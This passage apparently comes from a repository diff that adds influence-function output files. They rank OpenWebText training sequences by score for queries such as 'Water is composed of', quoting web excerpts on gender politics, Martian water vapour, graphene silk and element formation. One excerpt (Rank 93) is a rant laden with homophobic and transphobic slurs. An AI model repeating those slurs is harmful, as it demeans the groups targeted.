of teenage boyband fans, whose attention, it is assumed, must be on the floppy-haired singers, not the music itself. When feminist Doctor Who anthology Chicks Unravel Time was published last year, one of the essays that raised most eyebrows was Laura Mead’s meditation on the Doctor +================================================================================ +Rank = 88; Score = 262144.0 +<|begin_of_text|>Katharine Sophie Viner (born 4 January 1971)[2][3][4] is a British journalist and playwright. She became the first female editor-in-chief at The Guardian on 1 June 2015 succeeding Alan Rusbridger.[5][6] Viner previously headed The Guardian's web operations in Australia and the United States, before being selected for the editor-in-chief's position.[7] + +Early life and education [ edit ] + +Raised in Yorkshire,[3] Viner is the daughter of teachers. Her grandfather, Vic Viner, was an able seaman involved in the Dunkirk evacuation.[8][9] Viner was educated at Ripon Grammar School,[10] where she was head girl.[11] As a teenager, she joined Youth CND and the Anti-Apartheid Movement, although the nearest groups were 25 miles away, and read Spare Rib.[3] Her first newspaper article, published in The Guardian in 1987 while she was still at school, was on the ending of the GCE O level examinations, which were being replaced in the UK by the General Certificate of Secondary Education (GCSE).[12] "Cramming five years of knowledge into two and a half hours does not seem to be a fair system", she wrote.[11] Around 1988, Viner had a period of work experience at the Ripon Gazette, her local newspaper.[13][14] + +After A levels Viner read English at Pembroke College, Oxford.[11] Just before her finals, Viner won a competition organised by The Guardian's women's page and was advised by Louise Chunn, then Guardian women's editor, to pursue a career in journalism. "I honestly thought journalism wasn't for me, I thought it was for men in suits in London", she remembered in 2005.[15] During her 20s, Viner spent most of her holidays in the Middle East, a region in which she has a particular interest, spending time in Lebanon, Syria, Israel, the West Bank and other locations.[15] + +Career beginnings [ edit ] + +For work experience, Viner joined Cosmopolitan, a women's monthly magazine. The magazine retained her afterwards and she became features assistant, then news and careers editor;[15] earlier, she had won another student competition involving a submission to the magazine.[16] After three years at The Sunday Times, working as a commissioning editor and writer for its magazine.[15] Viner joined The Guardian in 1997 +================================================================================ +Rank = 89; Score = 261120.0 +<|begin_of_text|>Yet many of its earliest members are still there. They’re now in their 50s, 60s, and 70s. They’ve been talking to each other every day for 27 years. + +Echo might serve as a kind of Grant and Glueck Study for denizens of virtual communities—a longevity survey that can tell us something about the future of the larger social networks that followed it. How has Echo evolved and changed as its members have moved through life? Does online community mean something different to them, 30 years on? + +119:4) joe rosen 11-APR-2017 21:05 This can go either of two ways (but more likely option 2): 1) ECHO ruined my life -- i.e. I spent all my time here developing “remote” relationships, satisfying some need for “friends” instead of cultivating a “real life”. OR 2) Without ECHO I’d have no friends (or life) at all, because really I was never going to bother hanging out with anyone in “real life” anyway. + +* * * + +When Echo was created, the internet was just beginning to be touted as cool. It was before MySpace or Friendster, before Amazon, before the World Wide Web. There was still no faith that the internet had any commercial potential, and Echo’s founder, Stacy Horn, a former telecommunications analyst at Mobil, failed to attract investors to her project, and had to start it with her life savings of $20,000. For the first few years, it was run from her fifth-floor walk-up apartment; for a while, it graduated to a swanky Tribeca office, but it’s back in Horn’s living room today. + +At its peak, Echo had 2,000 members. Forty percent of them were women, a considerable achievement in an era when somewhere around 90 percent of internet users were men. Twice a month, everyone was invited to a real-life Echo party, and all the people who came could fit into one medium-sized Manhattan bar. + +Horn wasn’t just the owner, but a daily participant, talking openly about her personal problems, her favorite TV shows, what she had for lunch. She dated several Echoids, including my husband, who dated at least a dozen others. The atmosphere was incestuous, intimate, intense. At 3 a.m., despairing Echoids would log in to share their existential doubts; at 3 p.m., they’d talk about the conversation they had at +================================================================================ +Rank = 90; Score = 258048.0 +<|begin_of_text|>Ed Smith, 16, Daisy Abraham, 16, and Rose MacKenzie, 15, pictured in the new gender-neutral toilets. + +For a transgender teenager, something as simple as going to the loo at school can be a huge stress. + +So two Wellington schools are leading a dunny revolution: fitting gender-neutral bathrooms for students who feel uncomfortable using'male' or 'female' bathrooms. + +Wellington High School has transformed its level 4 boys' bathroom into, well, just a bathroom. + +And Onslow College is soon to follow suit, spending tens of thousands converting an old block of girls' toilets into gender-neutral facilities. + +READ MORE: + +* Farmers stores plan gender neutral changing rooms + +* Gender neutral toilets a sign of the times says Professor + +* Opinion: New Zealand needs gender-neutral loos and changing rooms + +* American school adopts gender-neutral bathrooms + +The schools join a global trend of schools and cities moving towards bathrooms that are not set up specifically for men or women. + +"Some people don't identify with male or female fully, so it's hard for those people not feeling they can go into one of those bathrooms," said Wellington High School student Rose MacKenzie. + +The 15-year-old said she had sometimes avoided using bathrooms in public, not knowing which to choose + +"If I go into one I know I'll be told this is the female bathroom, but if I go into the other I might receive threats because of, you know, what I look like," she said. + +MacKenzie is a member of Wellington High's UltraViolet club, representing LGBTQI+ students, which - led by student Ed Smith, 16 - raised the issue with the school board. + +Deputy principal Andrew Savage said UltraViolet put together a comprehensive proposal on how the urinals could be converted, with sanitary bins put in each cubicle, and the sign outside changed to simply read 'bathroom'. + +"The board of trustees listened to what the need was and within a short amount of time it was all done and dusted. It's kind of a boring story, in a good way," he laughed. + +"The sky didn't fall in, there was no Erin Brockovich moment, it was very straight-forward." + +Onslow College is also about to convert one block of girls' toilets into gender-neutral stalls, after its LGBTQI+ group Club Sandwich took the idea to staff. + +"It's all about respecting diversity and meeting the needs of diversity, and I think it is the way to go," principal Peter Leggat said. + +Rainbow +================================================================================ +Rank = 91; Score = 257024.0 +<|begin_of_text|>*Correction appended + +In lieutenant governor candidate Dan Patrick’s self portrait, he is a Christian first, a conservative second and a Republican third. The one notable descriptive omission is the geographic boundary that binds the Texas electorate: “Texan.” Despite what often feels like a statewide embrace of “Texas exceptionalism,” many here appear to eschew what others practically deem a birthright: the ability to call oneself a Texan. If polling data is any indication, the proportion of Texas voters who view themselves as Texans is smaller than one might think, but is likely to grow in the coming decades. + +In the February 2014 University of Texas/Texas Tribune Poll, we asked respondents whether they considered themselves Texans first and Americans second, or Americans first and Texans second. Overall, just over a quarter of registered voters — 27 percent — considered themselves to be Texans first. + +Democrats and liberals overwhelmingly identify as Americans before they identify as Texans (84 percent and 92 percent respectively), and while majorities of Republicans and conservatives identify as Americans first, significant proportions (35 percent and 36 percent respectively) identify first as Texans. This difference is a probable reflection of the current Republican statewide dominance and, in turn, each voter’s willingness to identify with the state. + +The Texas Tribune thanks its sponsors. Become one. + +The Texas-first crowd also includes more men than women. While 32 percent of men describe themselves as Texans first, only 23 percent of women make the same choice. + +Looking to the future, it’s possible that those identifying as Texans will grow. The members of the racial/ethnic group most likely to describe themselves as Texans first are not, in fact, Anglos, among whom 27 percent describe themselves as Texans, but are instead the growing population of Hispanics, among whom 33 percent identify as Texan first. + +Maybe even more surprising, younger voters are more inclined to call themselves Texans first. A slight majority of those who identify as Texans first are between the ages of 18 and 44 years old. Among 18- to 29-year-olds, 40 percent identify as Texans before they identify as Americans, far outpacing any other age group. It’s not grandpa that places the Lone Star over the Stars and Stripes, but his grandchildren. + +Texas already has a regular front-row seat in the fight over federal-state power, and Texans generally consider their government to be a model for other states to follow. While it might be convenient to believe that the most Texan people in Texas are distributed around the VA halls, +================================================================================ +Rank = 92; Score = 256000.0 +<|begin_of_text|>Sex discrimination commissioner says lack of women in Parliament impacts on major issues facing women + +Updated + +Sex discrimination commissioner Elizabeth Broderick says the lack of women in Parliament has a direct impact on major issues affecting women. + +Speaking on International Women's Day, Ms Broderick says she supports any measure that would boost the number of women in Parliament. + +"We absolutely need power to be shared in the Parliament between men and women," she told ABC local radio. + +"There is an assumption well-educated Australian women will just trickle into positions of power. We know it's not true. + +"What we do still need is some active intervention." + +Her comments come after Liberal Party backbencher Sharman Stone said the party should introduce mandatory quotas to boost the number of women in Parliament. + +Prime Minister Tony Abbott has been criticised for only having one woman in his Cabinet, Foreign Minister Julie Bishop. + +The Labor Party has long had a quota system in place but is yet to achieve its target of women in 40 per cent of seats. + +Dr Stone has suggested the Liberals look to Labor for ideas about how to get women into politics. + +"We've got to be, I think, much more structured about making sure women come through," Dr Stone said. + +"I don't care about that 'tokenism' label; bring it on if you must." + +Women should have greater role in Parliament: Broderick + +According to Ms Broderick, women make up just one third of Australian parliamentarians. + +"I think it's important that women's voices are heard at the highest level," she said. + +She says the lack of women in Parliament has a direct impact on issues such as domestic violence, working conditions for women, their leadership roles and pay equality. + +Ms Broderick is calling on men to use their power to help achieve gender equality in Australia. + +She says that while progress was achieved last year in a number of areas, more men need to advocate for women's rights. + +"Power in a country like Australia, in fact any country in the world, largely sits in the hands of men," she said. + +"And if we want to create change, we need good, decent men taking the message of gender equality to other men. + +"That's what's going to create change in countries." + +Men stepping up support but more advocacy needed + +The sex discrimination commissioner says men have stepped up their support in recent times but more advocacy is needed. + +"I think the real shift we saw in the last year was we had more men getting on board, stepping up and being prepared to do some strong advocacy around gender equality and that +================================================================================ +Rank = 93; Score = 254976.0 +<|begin_of_text|>The Illusion of Diversity. + +In a world full of Safe Spaces, Trigger warnings, Gender Wage Gaps and Racists. There is one thing the liberal fucktard left will shove in our faces, DIVERSITY. + +The left believes they are Diversity masters because they took a gender studies class (Or as I call it a waste of money class). and hate Cis-gender, Heterosexual, White Men. + +One thing they forgot about Diversity is Diversity of opinions. The diversity of beliefs, Diversity of Speech and Diversity of actions. + +I can’t attend one of these diversity groups (Not that I want to) because I call Myself a Faggot who supports Trump, I don’t believe the USA is inherently racist, I don’t believe we are all Homophobic and most of all I am perceived as White. + +Black, RugMunching, feminist Trannies are their idea of Diversity. + +The left preaches what they don’t even have a grip on. Right wing conservatives (or as they like to call us Old white men that don’t care about Women, LGBT or Blacks) are better than Liberals at Diversity. They have this radical notion that diversity is who they pick and choose based on Skin color, Family, political orientation, and beliefs. + +This idea of Diversity is the basis of Authoritarianism. Selective participation based on the ideas of the leaders, Similar to North Korea where you are assigned a job, a Haircut and you are told to have the same beliefs as your leaders or you and your family will be persecuted. + +But I’m allegedly just a white supremacist, Patriarchy contributor, and Woman hater. No, I just prefer men. FUCK. Can’t I have a preference? + +Stay fabulous and get your feminism vaccine.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 94; Score = 254976.0 +<|begin_of_text|>With demands the American people be shown the bill, Sen. Bernie Sanders (I-Vt.) stood with his Democratic colleagues in the Senate on Monday night to "hold the floor" as a way to draw attention to Republicans efforts to rush through their Trumpcare legislation under cover of darkness. + +Critics of the Republicans say their repeal and replace bill is nothing more than a massive tax break for the wealthy that would also strip healthcare coverage from millions of Americans while making it worse for nearly everyone. + +As Sanders tweeted: "The truth is that this is not a 'health care' bill. This is a 'tax breaks for the rich and multinational corporations' bill." And: "This health care bill will impact millions and millions of Americans. Yet we have not had one hearing. Republicans should be embarrassed." + +Outside groups like MoveOn.org, Indivisible, and Planned Parenthood Action have all been rallying against the Republican plan and urging Democrats to escalate their opposition. + +"Congress wants to take away our health care—we can't let it happen," said Planned Parenthood Action in a message to its members on Monday. And Indivisible tweeted: "By shutting down the Senate, @ SenateDems are drawing more attention to the secrecy and speed with which the GOP's # TrumpCare is moving." + +From MoveOn.org: + +SCROLL TO CONTINUE WITH CONTENT Help Keep Common Dreams Alive Our progressive news model only survives if those informed and inspired by this work support our efforts + +"What are you afraid of?" Sanders asked Senate Republicans during his remarks on the floor late Monday night. "Healthcare constitutes one-sixth of the U.S. economy. It impacts every man, woman, and child in our nation and yet we have thirteen Republicans—all men—working behind closed doors to produce legislation that will be brought to the United States Senate at the last moment so the American people won't know the disaster that it is." + +Senate Minority Leader Chuck Schumer (D-NY) said Monday it was obvious that "Republicans are writing their healthcare bill under the cover of darkness because they are ashamed of it." + +During his remarks from the Senate floor Monday night, Schumer challenged Senator Majority Leader Mitch McConnell to reconsider efforts to rush the bill towards a vote ahead of the upcoming July 4th recess. If Republicans refuse to relent, however, Schumer said Democrats would do everything in their power to hinder McConnell's "dark" and "hidden" process. + +"This radical departure from normal procedure on a bill of such consequence leaves the Senate minority little choice but to depart from normal procedure as well," Schumer said. +================================================================================ +Rank = 95; Score = 254976.0 +<|begin_of_text|>The Ascent Of Afghan Women + +Enlarge this image Sandra Calligaro for NPR Sandra Calligaro for NPR + +Zahra Karimi Nooristani, 18, cautiously works her way down a rock face high above Kabul as her coach, Farhad Jamshid, guides her. + +It is hazardous for his top female student to be rappelling here, not only because of the steep drop, but because she is using a frayed, 9-year-old rope handed down from the men's mountaineering team. + +Another danger she faces is the prospect of her neighbors finding out she's climbing at all. + +Afghanistan is a mountainous country, but scaling the peaks for sport is a new concept here. Mountaineering is considered an odd pastime for men, let alone women whose modesty Afghan society demands be protected at any cost — even death. + +Zahra says her father, who carves gravestones for a living, has told her he is prepared to move the family to protect her and her three sisters, who are also budding climbers. He and his daughters are adamant they be allowed to practice their new skills. + +The dedication of the Nooristani sisters and the devotion of their father inspires Marina Kielpinski LeGree — the force behind the girls' training. In the image below, she's sitting with Afghan colleague Faisal Naziry (center) and Malang Darya, a well-known Afghan climber (far left). + +Enlarge this image Sandra Calligaro for NPR Sandra Calligaro for NPR + +LeGree, a 36-year-old resident of Norfolk, Va., who has spent years shepherding development projects in northeastern Afghanistan, directs a nonprofit called Ascend that funds and organizes not only the training, but leadership classes for the Nooristani sisters and a handful of other Afghan girls recruited to be mountain climbers. + +LeGree says her goal is to create a crop of Afghan heroines passionate about improving their country and who inspire other women here to break barriers. + +"It's a profound thing that's been missing for a while in Afghanistan throughout the war and chaos and everything else," LeGree says. "It doesn't mean the housewife who is in her compound in Kandahar is going to go start climbing mountains, but she will know another Afghan woman did it and that message is really important." + +The new team's ultimate test will come later this year, when Ascend takes the young women to the remote, northeastern corner of Afghanistan to scale the country's highest +================================================================================ +Rank = 96; Score = 254976.0 +<|begin_of_text|>I keep seeing the word "meritocracy" pop up, mostly in discussions that seem to have stemmed from Faruk Ateş' "A primer on sexism in the tech industry". Do yourself a favor, don't go googling. It's the same shit: "Sexism isn't real because I'm a woman and no one did the sexism to me!" "Women resent being treated as women instead of being evaluated solely on their capabilities!" "You're a sexist moron!" "Some people called me a sexist moron after my moronic sexist blog post and it hurt my little feelings and I'm leaving the internet!" "You GUYS, remember this is supposed to be a meritocracy." + +Except no. No it fucking isn't. Because a meritocracy is not a real thing. It is a joke. + +The word meritocracy comes from a political satire. It was never meant to be something we should aspire to. It was the opposite, actually, a warning about how we rationalize what we believe we've "earned". If that sentence doesn't seem to you applicable to the tech industry and our cyclical discussions about sexism, racism, and even occasionally classism, go get yourself another cup of coffee. + +There's some dumb bullshit in one of the current crop of reaction posts waxing poetic about "hacker culture," and its freedom of speech and lack of PC dogma. Hacker culture was a bunch of white dudes. Hacker culture is a great example of a meritocracy. Some of the most privileged of the privileged got together and formed a community around the idea that they were smarter than everyone else. They created an arbitrary set of metrics for membership and according to their metrics, they triumphed. This was the first time in the history of the world white men had experienced the elation of peer recognition. + +A meritocracy is not a system for locating and rewarding the best of the best. If it were, the "best of the best" in almost every goddamned industry or group on the planet would not be a clump of white men. I'm having trouble finding good stats on this, but white men are something like 8% of the world's population. When you go to a fucking conference and you look around at all the white dudes, do you really honestly think, "Wow! What a bizarre fucking statistical anomaly it is that basically everyone with the special magic gift of computer programming happened to be born into a teeny tiny little demographic sliver of the population"? Of course you don't. +================================================================================ +Rank = 97; Score = 253952.0 +<|begin_of_text|>Finding a mate is one of the basic instincts of all living beings, and in most of the animal and insect world, it’s all done by smell. Sniffing out gender is something that animals are built to do, both with the appropriate scent-releasing structures to perfume the air with sex pheromones, and the most sensitive odor-detecting organs on the planet. + +Now scientists report in the journal Current Biology that people may have that ability as well, even if we aren’t always aware of it. Humans don’t have the same sophisticated olfactory organs as some of our animal counterparts, and while men and women do exude different scents, it’s been harder to confirm that people can pick up on these odors, or that they were working as sex pheromones to attract two people to each other. + +MORE: Your Nose Can Smell at Least 1 Trillion Scents + +In the latest study on the subject, researchers in China and at the University of Minnesota conducted a small study in which both men and women of different sexual orientation were exposed to male, female or neutral scents without their knowledge on three consecutive days while they viewed a series of computer dots representing a person walking. + +The Brief Newsletter Sign up to receive the top stories you need to know right now. View Sample Sign Up Now + +Heterosexual men thought the dots showed a more feminine gait when they were exposed to the female hormone estratetraenol. There was a similar effect among heterosexual women, who were biased to see the dots showing a more masculine gait when they smelled the male hormone androstadienone. Gay men responded more like the women to the two hormones, while bisexual or homosexual women showed more varied responses, between those of heterosexual men and women. + +MORE: Can Your Smelly Shirt Land You a Better First Date? + +“The study shows that people subconsciously extract gender information from chemosensory cues [that depend] on their gender and sexual orientation,” says Wen Zhou, the study’s lead author from the Chinese Academy of Sciences in Beijing, in an email discussion about the findings. + +Zhou isn’t quite ready to say that estratetraenol and androstadienone, which are steroid products of estrogen and testosterone, respectively, work as sex pheromones between men and women by acting as sexual stimulants, since the group did not test how smelling varying amounts of the agents affected people’s sensitivities toward gender. + +But the findings provide the first hint that gender may +================================================================================ +Rank = 98; Score = 252928.0 +<|begin_of_text|>Looking for news you can trust? + +Subscribe to our free newsletters. + +Read an updated version of this article here. + +The National Rifle Association claims to speak for more than 4 million gun owners. But the shots are really called by a hush-hush group of 76 directors. The majority are nominated via a top-down process and elected by a small fraction of NRA members. A breakdown of the current board, based on their official bios: + +87 percent are men. 93 percent are white. + +25 percent are current or former federal, state, or local lawmakers or officials. + +22 percent are current or former law enforcement officers. 30 percent are current or former members of the military. + +24 percent are lawyers. + +12 percent are entertainers or athletes. + +64 percent are hunters. 71 percent are sport or competitive shooters. + +At least 71 percent were nominated, endorsed, or selected by the NRA’s Nominating Committee. + +Some notable members of the NRA’s current board of directors: + +More: See a complete list of NRA board members in 2013. + +* Correction: An earlier version incorrectly stated that Carl T. Rowan Jr. is currently employed by Securitas, based on his bio on the NRA site. Securitas told Mother Jones that it no longer employs him. + +Members of the NRA board of directors in 2013 + +Joe M. Allbaugh + +William H. Allen + +Dr. Thomas P. Arvas + +Scott L. Bach + +William A. Bachenberg + +Frank E. Bachhuber Jr. + +M. Carol Bambery + +Bob Barr + +Ronnie G. Barrett + +Clel Baudler + +David E. Bennett + +J. Kenneth Blackwell + +Matt Blunt + +Dan Boren + +Robert K. Brown + +Pete Brownell + +Dave Butz + +J. William “Bill” Carter + +Ted W. Carter + +Richard Childress + +Patricia A. Clark + +Allan D. Cors + +Charles L. Cotton, + +David G. Coy + +Larry E. Craig John L. Cushman + +William H. Dailey + +Joseph P. Debergalis Jr. + +R. Lee “The Gunny” Ermey + +Edie P. Fleeman + +Joel Friedman + +Sandra S. Froman + +Tom Gaines + +James S. Gilmore III + +Marion P. Hammer + +Maria Heil + +Graham Hill + +Stephen D. Hornady + +Susan Howard + +Roy Innis + +H. Joaquin Jackson + +Curtis S. Jenkins + +David A. +================================================================================ +Rank = 99; Score = 252928.0 +<|begin_of_text|>From left, Melissa McCarthy, Kate McKinnon, Kristen Wiig and Leslie Jones appear in a scene from, "Ghostbusters." (Sony Pictures via AP/AP) + +It’s not that they hate women, some of the haters will argue. + +Because when women stick to the hater-approved roles — mother, nurse, beauty queen, schoolteacher, model — the misogynists love them. + +“I cherish women,” Donald Trump insisted, after trashing Fox News Channel’s Megyn Kelly and alluding to her menstrual cycle when she pan-seared him during a debate. + +What really sets off the haters is when women do things that men have traditionally done: Firefighter, sportswriter, Army Ranger, video game designer, commander in chief. Even a made-up occupation — Ghostbuster — is apparently off limits to women. + +Yup, turns out that this weekend’s opening of the Ghostbuster’s movie reboot has turned into a ridiculous, gender-charged standoff. + +From left, Harold Ramis, Dan Aykroyd, Bill Murray and Ernie Hudson in the 1984 version of the movie. (Columbia Pictures/Alamy/Alamy Stock Photo) + +The haters vow that they’re not going to spend a dime or a minute on the update of their beloved movie, sullied by female leads. Feminists are calling on all women to head to the box office this weekend and get their ectoplasmic ooze on to support women’s rights. + +It sounds silly. But it speaks to much larger issues. + +The outrage over Ghostbusters began last year when it was announced that the four ghoul hunters in the remake of the goofy and clever 1984 movie would be women. Dudes in the bro-verse went ape. “Now they wanna ruin Ghostbusters with women?” they demanded. + +Some of the notoriously hateful misogynist sites actively enlisted men to attack the trailer when it came out, simply to tear down a movie they hadn’t even seen. + +What made it even worse for the men who felt their childhood attachment to Bill Murray threatened was the fact that the four new Ghostbusters are talented, smart comedians. And not the Victoria’s Secret angels. + +Lingerie models might’ve been okay, in the bro-verse. Especially if they didn’t say anything. + +Because remember, women accounted for only 30 percent of speaking roles in the top 100 films of 2013, according to “It’s a Man’s (Celluloid) World” survey by Martha M. Lauzen, executive diff --git a/examples/openwebtext/files/score_arguments.json b/examples/openwebtext/files/scores_raw/score_arguments.json similarity index 85% rename from examples/openwebtext/files/score_arguments.json rename to examples/openwebtext/files/scores_raw/score_arguments.json index 0993172..a8df9ab 100644 --- a/examples/openwebtext/files/score_arguments.json +++ b/examples/openwebtext/files/scores_raw/score_arguments.json @@ -13,7 +13,7 @@ "aggregate_train_gradients": false, "use_measurement_for_self_influence": false, "query_gradient_svd_dtype": "torch.float32", - "per_sample_gradient_dtype": "torch.bfloat16", - "precondition_dtype": "torch.bfloat16", + "per_sample_gradient_dtype": "torch.float32", + "precondition_dtype": "torch.float32", "score_dtype": "torch.bfloat16" } \ No newline at end of file diff --git a/examples/openwebtext/files/train_dataset_metadata.json b/examples/openwebtext/files/scores_raw/train_dataset_metadata.json similarity index 100% rename from examples/openwebtext/files/train_dataset_metadata.json rename to examples/openwebtext/files/scores_raw/train_dataset_metadata.json diff --git a/examples/openwebtext/files/scores_raw/water.txt b/examples/openwebtext/files/scores_raw/water.txt new file mode 100644 index 0000000..464dcba --- /dev/null +++ b/examples/openwebtext/files/scores_raw/water.txt @@ -0,0 +1,2060 @@ +Query Sequence: +Prompt:Water is composed of; Completion: hydrogen and oxygen atoms. + +Top Influential Sequences: +================================================================================ +Rank = 0; Score = 4784128.0 +<|begin_of_text|>[/caption] + +Last week, scientists announced findings based on data from the SPICAM spectrometer onboard ESA’s Mars Express spacecraft. The findings reported in Science by Maltagliati et al (2011), reveal that the Martian atmosphere is supersaturated with water vapor. According to the research team, the discovery provides new information which will help scientists better understand the water cycle and atmospheric history of Mars. + +What processes are at work to allow large amounts of water vapor in the Martian atmosphere? + +The animated sequence to the left shows the water cycle of the Martian atmosphere in action: + +When the polar caps of Mars (which contain frozen Water and CO 2 ) are warmed by the Sun during spring and summer, the water sublimates and is released into the atmosphere. + +Atmospheric winds transport the water vapor molecules to higher altitudes. When the water molecules combine with dust molecules, clouds are formed. If there isn’t much dust in the atmosphere, the rate of condensation is reduced, which leaves water vapor in the atmosphere, creating a supersaturated state. + +Water vapor may also be transported by wind to the southern hemisphere or may be carried high in the atmosphere.In the upper atmosphere the water vapor can be affected by photodissociation in which solar radiation (white arrows) splits the water molecules into hydrogen and oxygen atoms, which then escape into space. + +Scientists had generally assumed that supersaturation cannot exist in the cold Martian atmosphere, believing that any water vapor in excess of saturation instantly froze. Data from SPICAM revealed that supersaturation takes place at altitudes of up to 50 km above the surface when Mars is at its farthest point from the Sun. + +Based on the SPICAM data, scientists have learned that there is more water vapor in the Martian atmosphere than previously believed. While the amount of water in Mars’ atmosphere is about 10,000 times less water vapor than that of Earth, previous models have underestimated the amount of water in the Martian atmosphere at altitudes of 20-50km, as the data suggests 10 to 100 times more water than expected at said altitudes. + +“The vertical distribution of water vapour is a key factor in the study of Mars’ hydrological cycle, and the old paradigm that it is mainly controlled by saturation physics now needs to be revised,” said Luca Maltagliati, one of the authors of the paper. “Our finding has major implications for understanding the planet’s global climate and the transport of water from one hemisphere to the other.” + +“The data suggest that much more water +================================================================================ +Rank = 1; Score = 3932160.0 +<|begin_of_text|>Spiders sprayed with a thin layer of graphene and carbon nanotubes have produced super-strong webs with record-beating properties. + +Combining one of the strongest natural materials with one of the strongest artificial materials, researchers at the University of Trento in Italy created what they describe as "super silk". + +"The protein matrix and hard tissues of insects, worms, ants and spiders naturally incorporates metals, such as zinc, manganese and copper," the study states. "This leads to mechanical hardening of teeth, jaws, mandibles, ovipositors and to an enhancement of silk toughness. + +What is graphene? Graphene is a one-atom-thick material made of carbon atoms arranged in a honeycomb lattice that is 200-times stronger than steel, more conductive than copper and as flexible as rubber. It has been touted as a "wonder material" by scientists for its remarkable properties and vast range of uses, which include everything from flexible smartphone screens to artificial retinas. + +"Thus, the artificial incorporation of metals, or even insulating or semiconducting materials, into these protein structures could be exploited to obtain a reinforced matrix." + +The silk created by the graphene-coated spiders is 3.5 times tougher than that of the giant riverine orb spider - the strongest silk known to nature. + +The process that leads to the graphene and carbon nanotubes being infused in the silk is still not clear to the researchers, though the principle theory is that spiders make use of materials found within their immediate environments when spinning silk. + +Nicola Pugno, the lead researcher in the study, believes that the strength of the material produced is the highest reported to date, even when compared to high performance fibres like kevlar or the current toughest knotted fibres. + +The researchers hope that similar techniques in the future can be used to create a new class of bionic materials and have suggested that one potential application could be to create a giant net capable of catching falling aircraft. + +"This approach could be extended to other animals and plants and could lead to a new class of bionic materials for ultimate applications," Pugno said. + +"This concept could become a way to obtain materials with superior characteristics."<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 2; Score = 3293184.0 +<|begin_of_text|>Our world is made of elements and combinations of elements called compounds. An element is a pure substance made of atoms that are all of the same type. At present, 116 elements are known, and only about 90 of these occur naturally. + +Elements and the ‘Big Bang’ theory + +During the formation of the universe some 14 billion years ago in the so-called ‘Big Bang’, only the lightest elements were formed – hydrogen and helium along with trace amounts of lithium and beryllium. As the cloud of cosmic dust and gases from the Big Bang cooled, stars formed, and these then grouped together to form galaxies. + +The other 86 elements found in nature were created in nuclear reactions in these stars and in huge stellar explosions known as supernovae. + +Elements and our Sun + +For most of their lives, stars fuse elemental hydrogen into helium in their cores. Two atoms of hydrogen are combined in a series of steps to create helium-4. These reactions account for 85% of the Sun’s energy. The remaining 15% comes from reactions that produce the elements beryllium and lithium. + +The energy from these nuclear reactions is emitted in various forms of radiation such as ultraviolet light, X-rays, visible light, infrared rays, microwaves and radio waves. In addition, energised particles such as neutrinos and protons are released, and it is these that make up the solar wind. + +Earth is in the path of this energy stream, which warms the planet, drives weather and provides energy for life. The Earth’s atmosphere is able to screen out most of the harmful radiation, and the Earth’s magnetic field can deflect the harmful effects of the solar wind. + +Dying stars + +When a star’s core runs out of hydrogen, the star begins to die out. The dying star expands into a red giant, and this now begins to manufacture carbon atoms by fusing helium atoms. + +More massive stars begin a further series of nuclear burning or reaction stages. The elements formed in these stages range from oxygen through to iron. + +During a supernova, the star releases very large amounts of energy as well as neutrons, which allows elements heavier than iron, such as uranium and gold, to be 